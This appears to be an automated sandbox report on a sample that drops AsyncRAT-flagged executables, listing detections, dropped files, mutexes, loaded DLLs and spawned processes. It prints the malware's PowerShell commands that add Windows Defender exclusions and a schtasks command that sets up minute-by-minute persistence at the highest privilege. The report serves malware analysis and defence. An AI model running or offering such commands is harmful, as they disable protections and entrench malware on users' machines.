                  Source: powershell.exe, 0000000C.00000002.1563070719.00000225B6299000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1640428748.00000212AC969000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1771422667.000002168817A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1972585830.000001250022A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                  Source: r4RF3TX5Mi.exe, 00000001.00000002.1360571480.0000020DA8607000.00000004.00000800.00020000.00000000.sdmp, OptiProV2.exe, 0000000B.00000002.2520367269.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1563070719.00000225B6071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1640428748.00000212AC741000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1771422667.0000021687F51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1972585830.0000012500001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 0000000C.00000002.1563070719.00000225B6299000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1640428748.00000212AC969000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1771422667.000002168817A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1972585830.000001250022A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                  Source: powershell.exe, 00000017.00000002.1972585830.000001250022A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 0000000C.00000002.1563070719.00000225B6071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1640428748.00000212AC741000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1771422667.0000021687F51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1972585830.0000012500001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                  Source: powershell.exe, 00000017.00000002.2130635621.000001251006B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000017.00000002.2130635621.000001251006B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000017.00000002.2130635621.000001251006B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: powershell.exe, 00000017.00000002.1972585830.000001250022A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 0000000C.00000002.1587825867.00000225C60E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1710868001.00000212BC7B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1890195200.0000021697FC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2130635621.000001251006B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

                  Operating System Destruction

                  barindex
                  Protects its processes via BreakOnTermination flag
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess information set: 01 00 00 00 Jump to behavior

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 11.0.OptiProV2.exe.9a0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 11.2.OptiProV2.exe.12af9ac0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 11.2.OptiProV2.exe.12af9ac0.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 0000000B.00000002.2523471436.0000000012AF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 0000000B.00000000.1357544208.00000000009A2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: C:\Program Files\Common Files\OptiProV2.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: C:\Users\user\AppData\Local\Opti.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: C:\Program Files\Common Files\OptiProV2.exeCode function: 11_2_00007FFAACCD7F7611_2_00007FFAACCD7F76
                  Source: C:\Program Files\Common Files\OptiProV2.exeCode function: 11_2_00007FFAACCD8D2211_2_00007FFAACCD8D22
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFAACCB208D12_2_00007FFAACCB208D
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFAACDA2E1119_2_00007FFAACDA2E11
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FFAACD839D123_2_00007FFAACD839D1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FFAACD82E1123_2_00007FFAACD82E11
                  Source: C:\Users\user\AppData\Local\Opti.exeCode function: 27_2_00007FFAACCC0E1027_2_00007FFAACCC0E10
                  Source: C:\Users\user\AppData\Local\Opti.exeCode function: 28_2_00007FFAACCD0E1028_2_00007FFAACCD0E10
                  Source: r4RF3TX5Mi.exeStatic PE information: No import functions for PE file found
                  Source: r4RF3TX5Mi.exe, 00000001.00000000.1264867970.0000020DA6974000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameOptiPro.exe" vs r4RF3TX5Mi.exe
                  Source: r4RF3TX5Mi.exeBinary or memory string: OriginalFilenameOptiPro.exe" vs r4RF3TX5Mi.exe
                  Source: 11.0.OptiProV2.exe.9a0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 11.2.OptiProV2.exe.12af9ac0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 11.2.OptiProV2.exe.12af9ac0.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 0000000B.00000002.2523471436.0000000012AF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 0000000B.00000000.1357544208.00000000009A2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: C:\Program Files\Common Files\OptiProV2.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: C:\Users\user\AppData\Local\Opti.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: OptiProV2.exe.1.dr, 4v1Fg9lvwdMQcNkCpgcirqY4wESjnMUNt.csCryptographic APIs: 'TransformFinalBlock'
                  Source: OptiProV2.exe.1.dr, 4v1Fg9lvwdMQcNkCpgcirqY4wESjnMUNt.csCryptographic APIs: 'TransformFinalBlock'
                  Source: OptiProV2.exe.1.dr, lVpDaWz1ycqGdlIXQXG5trpz5VXRQgGsM.csCryptographic APIs: 'TransformFinalBlock'
                  Source: Opti.exe.11.dr, 4v1Fg9lvwdMQcNkCpgcirqY4wESjnMUNt.csCryptographic APIs: 'TransformFinalBlock'
                  Source: Opti.exe.11.dr, 4v1Fg9lvwdMQcNkCpgcirqY4wESjnMUNt.csCryptographic APIs: 'TransformFinalBlock'
                  Source: Opti.exe.11.dr, lVpDaWz1ycqGdlIXQXG5trpz5VXRQgGsM.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 11.2.OptiProV2.exe.12af9ac0.0.raw.unpack, 4v1Fg9lvwdMQcNkCpgcirqY4wESjnMUNt.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 11.2.OptiProV2.exe.12af9ac0.0.raw.unpack, 4v1Fg9lvwdMQcNkCpgcirqY4wESjnMUNt.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 11.2.OptiProV2.exe.12af9ac0.0.raw.unpack, lVpDaWz1ycqGdlIXQXG5trpz5VXRQgGsM.csCryptographic APIs: 'TransformFinalBlock'
                  Source: OptiProV2.exe.1.dr, qngCFWvYexWmPPmBbK7CLaJTpZl6E1ZBBL9wbTYcWFuxk0SRRfeGlSTw5p.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: OptiProV2.exe.1.dr, qngCFWvYexWmPPmBbK7CLaJTpZl6E1ZBBL9wbTYcWFuxk0SRRfeGlSTw5p.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: Opti.exe.11.dr, qngCFWvYexWmPPmBbK7CLaJTpZl6E1ZBBL9wbTYcWFuxk0SRRfeGlSTw5p.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: Opti.exe.11.dr, qngCFWvYexWmPPmBbK7CLaJTpZl6E1ZBBL9wbTYcWFuxk0SRRfeGlSTw5p.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 11.2.OptiProV2.exe.12af9ac0.0.raw.unpack, qngCFWvYexWmPPmBbK7CLaJTpZl6E1ZBBL9wbTYcWFuxk0SRRfeGlSTw5p.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 11.2.OptiProV2.exe.12af9ac0.0.raw.unpack, qngCFWvYexWmPPmBbK7CLaJTpZl6E1ZBBL9wbTYcWFuxk0SRRfeGlSTw5p.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: classification engineClassification label: mal100.troj.evad.winEXE@21/21@1/3
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeFile created: C:\Program Files\Common Files\OptiProV2.exeJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\r4RF3TX5Mi.exe.logJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeMutant created: \Sessions\1\BaseNamedObjects\K4U8tG8PuQl32C4f
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7960:120:WilError_03
                  Source: C:\Users\user\AppData\Local\Opti.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2444:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5528:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4024:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7320:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7728:120:WilError_03
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o4dy3etq.pt1.ps1Jump to behavior
                  Source: r4RF3TX5Mi.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: r4RF3TX5Mi.exeStatic file information: TRID: Win64 Executable Console Net Framework (206006/5) 48.58%
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: r4RF3TX5Mi.exeReversingLabs: Detection: 36%
                  Source: r4RF3TX5Mi.exeVirustotal: Detection: 50%
                  Source: unknownProcess created: C:\Users\user\Desktop\r4RF3TX5Mi.exe "C:\Users\user\Desktop\r4RF3TX5Mi.exe"
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeProcess created: C:\Program Files\Common Files\OptiProV2.exe "C:\Program Files\Common Files\OptiProV2.exe"
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\OptiProV2.exe'
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OptiProV2.exe'
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Opti.exe'
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Opti.exe'
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Opti" /tr "C:\Users\user\AppData\Local\Opti.exe"
                  Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Opti.exe C:\Users\user\AppData\Local\Opti.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Opti.exe C:\Users\user\AppData\Local\Opti.exe
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeProcess created: C:\Program Files\Common Files\OptiProV2.exe "C:\Program Files\Common Files\OptiProV2.exe" Jump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\OptiProV2.exe'Jump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OptiProV2.exe'Jump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Opti.exe'Jump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Opti.exe'Jump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Opti" /tr "C:\Users\user\AppData\Local\Opti.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeSection loaded: version.dllJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeSection loaded: avicap32.dllJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeSection loaded: msvfw32.dllJump to behavior
                  Source: C:\Program Files\Common Files\OptiProV2.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
